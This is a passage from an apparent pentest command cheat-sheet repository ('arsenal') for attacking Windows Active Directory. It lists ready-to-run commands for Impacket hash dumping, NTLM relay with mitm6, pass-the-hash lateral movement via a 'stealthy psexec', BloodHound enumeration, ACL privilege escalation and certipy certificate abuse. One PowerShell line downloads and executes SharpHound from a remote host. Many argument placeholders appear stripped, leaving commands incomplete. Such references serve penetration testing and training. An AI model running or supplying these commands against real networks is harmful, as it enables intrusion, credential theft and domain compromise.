-just-dc -pwd-last-set -user-status -outputfile /:@ 46 | ``` 47 | 48 | 49 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket-servertool-mitm.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | ## smbserver - share smb folder 4 | #plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE 5 | 6 | A Python implementation of an SMB server. Allows to quickly set up shares and user accounts. 7 | 8 | ``` 9 | smbserver.py 10 | ``` 11 | 12 | ## smbserver - share smb folder with authentication 13 | #plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE 14 | 15 | ``` 16 | smbserver.py -username -password 17 | ``` 18 | 19 | ## ntlmrelay - host a payload that will automatically be served to the remote host connecting 20 | #plateform/linux #target/serve #cat/ATTACK/MITM 21 | 22 | ``` 23 | ntlmrelayx.py -tf -smb2support -e 24 | ``` 25 | 26 | ## ntlmrelay - socks 27 | #plateform/linux #target/serve #cat/ATTACK/MITM 28 | ``` 29 | ntlmrelayx.py -tf -socks -smb2support 30 | ``` 31 | 32 | ## ntlmrelay - authenticate and dump hash 33 | #plateform/linux #target/serve #cat/ATTACK/MITM 34 | ``` 35 | ntlmrelayx.py -tf -smb2support 36 | ``` 37 | 38 | ## ntlmrelay - to use with mitm6 - relay to target 39 | #plateform/linux #target/serve #cat/ATTACK/MITM 40 | Next use the socks with proxychains : 41 | proxychains smbclient //ip/Users -U domain/user 42 | 43 | ``` 44 | ntlmrelayx.py -6 -wh -t smb:// -l /tmp -socks -debug 45 | ``` 46 | 47 | ## ntlmrelay - to use with mitm6 - delegate access 48 | #plateform/linux #target/serve #cat/ATTACK/MITM 49 | ``` 50 | ntlmrelayx.py -t ldaps:// -wh --delegate-access 51 | ``` 52 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket-smb_msrpc.md: -------------------------------------------------------------------------------- 1 | # impacket 2 | 3 | ## smbclient - connect to smb on the target 4 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 5 | 6 | A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. 7 | 8 | -hashes : 9 | -no-pass -k : kerberos authentication 10 | 11 | ``` 12 | smbclient.py /:@ 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | % impacket, windows, smb, 445 4 | 5 | ## lookupsid - SID User Enumeration, extract the information about what users exist and their data. 6 | #plateform/linux #target/remote #cat/RECON 7 | 8 | ``` 9 | lookupsid.py /:@ 10 | ``` 11 | 12 | ## reg - query registry info remotely 13 | #plateform/linux #target/remote #cat/RECON 14 | ``` 15 | reg.py /:@ query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s 16 | ``` 17 | 18 | ## rpcdump - list rpc endpoint 19 | #plateform/linux #target/remote #cat/RECON 20 | ``` 21 | rpcdump.py /:@ 22 | ``` 23 | 24 | ## services.py - (start, stop, delete, read status, config, list, create and change any service) remote 25 | #plateform/linux #target/remote #cat/RECON #cat/ATTACK/EXPLOIT 26 | ``` 27 | services.py /:@ 28 | ``` 29 | 30 | ## getarch - find target architecture (64 or 32 bits) 31 | #plateform/linux #target/remote #cat/RECON 32 | ``` 33 | getArch.py -target 34 | ``` 35 | 36 | ## netview - enumeration tool (ip/shares/sessions/logged users) - need dns set 37 | #plateform/linux #target/remote #cat/RECON 38 | ``` 39 | netview.py / -target -users 40 | ``` 41 | 42 | 43 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/SCShell.md: -------------------------------------------------------------------------------- 1 | # SCShell 2 | 3 | % SCShell, psexec, sealthy, DCERPC 4 | 5 | ## stealty psexec 6 | #plateform/linux #target/remote #cat/ATTACK/CONNECT 7 | 8 | no service created, no smb used, no file dropped 9 | https://github.com/Mr-Un1k0d3r/SCShell 10 | 11 | ``` 12 | python3 scshell.py -service-name -hashes : /@ 13 | ``` 14 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/bloodhound.md: -------------------------------------------------------------------------------- 1 | # bloodhound 2 | 3 | % bloodhound, Active directory enumeration 4 | 5 | ## start neo4j server 6 | #plateform/linux #target/serve #cat/UTILS 7 | https://neo4j.com/docs/ 8 | 9 | ```bash 10 | neo4j start 11 | ``` 12 | 13 | ## bloodhound start IHM 14 | #plateform/linux #target/local #cat/RECON 15 | https://github.com/BloodHoundAD/BloodHound 16 | 17 | ```bash 18 | bloodhound 19 | ``` 20 | 21 | ## bloodhound - collect data 22 | #plateform/linux #target/remote #port/389 #port/631 #cat/RECON 23 | https://github.com/fox-it/BloodHound.py 24 | 25 | ```bash 26 | bloodhound-python -d -u -p -c all 27 | ``` 28 | 29 | ## bloodhound - collect data (alternative) 30 | #plateform/linux #target/remote #port/389 #port/631 #cat/RECON 31 | https://github.com/fox-it/BloodHound.py 32 | 33 | ```bash 34 | bloodhound-python -d -u -p -gc -dc -c all 35 | ``` 36 | 37 | ## sharphound - collect bloodhound data 38 | #plateform/windows #target/remote #port/389 #port/631 #cat/RECON 39 | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors 40 | 41 | ```powershell 42 | import-module sharphound.ps1 43 | invoke-bloodhound -collectionmethod all -domain 44 | ``` 45 | 46 | ## sharphound - collect bloodhound data download and execute 47 | #plateform/windows #target/remote #port/389 #port/631 #cat/RECON 48 | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors 49 | 50 | ```powershell 51 | (new-object system.net.webclient).downloadstring('http:///SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain 52 | ``` 53 | 54 | ## cypheroth - start 55 | #plateform/linux #target/local #cat/RECON 56 | Toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets. 57 | 58 | https://github.com/seajaysec/cypheroth 59 | 60 | ```bash 61 | cypheroth -u -p -d 62 | ``` 63 | 64 | ## aclpwn - from computer to domain - dry run 65 | #plateform/linux #target/local #cat/RECON 66 | Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. 67 | 68 | https://github.com/fox-it/aclpwn.py 69 | 70 | ``` 71 | aclpwn -f -ft computer -d -dry 72 | ``` 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/certipy.md: -------------------------------------------------------------------------------- 1 | # certipy 2 | 3 | % adcs, certificate, pki, windows, Active directory, template, shadow credential 4 | 5 | ## certipy - list certificate templates 6 | #plateform/linux #target/remote #cat/RECON 7 | ``` 8 | certipy find -u @ -p '' -dc-ip 9 | ``` 10 | 11 | ## certipy - request certificate 12 | #plateform/linux #target/remote #cat/ATTACK 13 | ``` 14 | certipy req -u @ -p '' -target -template